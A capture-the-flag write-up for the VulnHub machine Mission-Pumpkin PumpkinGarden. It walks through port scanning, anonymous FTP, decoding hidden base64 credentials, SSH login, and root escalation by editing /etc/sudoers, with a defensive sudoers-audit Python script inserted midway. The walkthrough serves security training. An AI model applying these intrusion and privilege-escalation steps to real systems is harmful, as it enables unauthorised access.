__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [VULNHUB] Mission-Pumpkin v1.0: PumpkinGarden [1]

NMAP
-----

We start by running nmap to see which ports are open.

..[sml@cassandra].[~]
.... $nmap -A -p- 192.168.20.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 18:45 CEST
Nmap scan report for 192.168.20.153
Host is up (0.00039s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.20.152
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds

FTP
---

We connect to the FTP server with the user "anonymous" and download the only file
there (note.txt).

..[sml@cassandra].[~]
.... $ftp 192.168.20.153
Connected to 192.168.20.153.
220 Welcome to Pumpkin's FTP service.
Name (192.168.20.153:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (1.0490 MB/s)
ftp> 


We look at the contents of the file.

..[sml@cassandra].[~]
.... $cat note.txt 
Hello Dear! 
Looking for route map to PumpkinGarden? I think jack can help you find it.

HTTP
----

We use gobuster to see whether we can find anything interesting on the web server.

..[.].[sml@cassandra].[~]
.... $gobuster -w /usr/share/wordlists/dirb/small.txt -u http://192.168.20.153:1515

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.20.153:1515/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/07 19:04:28 Starting gobuster
=====================================================
/img (Status: 301)
=====================================================
2019/07/07 19:04:28 Finished
=====================================================


We visit http://192.168.20.153:1515/img/hidden_secret/clue.txt
It contains: c2NhcmVjcm93IDogNVFuQCR5

We decode the contents of clue.txt; it is base64.

.[sml@cassandra].[~]
.... $echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$y

We now have credentials we can use to connect over ssh.

LOW SHELL
---------

..[sml@cassandra].[~]
.... $ssh -p 3535 scarecrow@192.168.20.153
------------------------------------------------------------------------------
			  Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
scarecrow@192.168.20.153's password: 
Last login: Sun Jul  7 22:20:54 2019 from 192.168.20.152
scarecrow@Pumpkin:~$ id
uid=1001(scarecrow) gid=1001(scarecrow) groups=1001(scarecrow)
scarecrow@Pumpkin:~$ 

scarecrow@Pumpkin:~$ cat note.txt 

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! 
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

We use the "password" to log in as goblin.

scarecrow@Pumpkin:~$ su goblin
Password: 
goblin@Pumpkin:/home/scarecrow$ 

goblin@Pumpkin:~$ sudo -l
[sudo] password for goblin: 
Matching Defaults entries for goblin on Pumpkin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goblin may run the following commands on Pumpkin:
    (root) ALL, !/bin/su

The goblin user can run everything with sudo except the su command. Since the
rule grants ALL, the "!/bin/su" exclusion is only cosmetic: any other command
run through sudo, including an editor, already runs as root. We will edit
/etc/sudoers so that goblin can run every command, su included.

We change the line %sudo ALL=ALL, !/bin/su to %sudo ALL=ALL.
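The sudoers pattern above (a blanket ALL grant followed by a "!" exclusion) is the kind of rule a defender wants to catch before a box is exposed. The following audit script is an added example, not part of the original writeup; it parses plain user-specification lines from a constructed sudoers sample (Cmnd_Alias expansion and backslash line continuations are not handled) and reports grants of ALL that rely on exclusions.

```python
"""Flag sudoers rules that grant ALL and then try to carve out exceptions.

Added example, not from the writeup. sudo(8) evaluates rules so that a user
granted ALL can reach the excluded command through any other command it
still permits (a shell, an editor, cp over /etc/sudoers), so "ALL, !/bin/su"
is not a deny rule. Only inline user specs are parsed; aliases are ignored.
"""
import re

# <who> <host>=[(runas)] <command list>   e.g.  %sudo ALL=ALL, !/bin/su
_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmnds>.+)$"
)
_SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# Constructed sample; the %sudo line mirrors the one found on the target.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) ALL
%sudo ALL=ALL, !/bin/su
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""


def parse_user_specs(text):
    """Return (who, host, runas, [cmnd, ...]) for each user spec line."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments and blanks
        if not line or line.startswith(_SKIP):
            continue
        m = _SPEC.match(line)
        if not m:
            continue
        cmnds = [c.strip() for c in m.group("cmnds").split(",") if c.strip()]
        specs.append((m.group("who"), m.group("host"), m.group("runas"), cmnds))
    return specs


def ineffective_exclusions(text):
    """Return [(who, [excluded cmnds])] for rules that grant ALL and negate."""
    findings = []
    for who, _host, _runas, cmnds in parse_user_specs(text):
        # "NOPASSWD: ALL" carries a tag; compare only the command part.
        grants_all = any(c.split(":")[-1].strip() == "ALL" for c in cmnds)
        excluded = [c for c in cmnds if c.split(":")[-1].strip().startswith("!")]
        if grants_all and excluded:
            findings.append((who, excluded))
    return findings


if __name__ == "__main__":
    for who, excluded in ineffective_exclusions(SAMPLE_SUDOERS):
        print(f"{who}: ALL granted, exclusions {excluded} are not enforceable")
```

Run it against a real file with `sudo cat /etc/sudoers` piped in, or against the contents of /etc/sudoers.d/*, and fix any hit by listing the allowed commands explicitly instead of subtracting from ALL.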

goblin@Pumpkin:~$ sudo nano /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=ALL, !/bin/su

Once the file has been edited:

goblin@Pumpkin:~$ sudo su
root@Pumpkin:/home/goblin# id
uid=0(root) gid=0(root) groups=0(root)

root@Pumpkin:~# cat PumpkinGarden_Key 
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# echo Q29uZ3JhdHVsYXRpb25zIQ== | base64 -d
Congratulations!
root@Pumpkin:~#


[1] https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/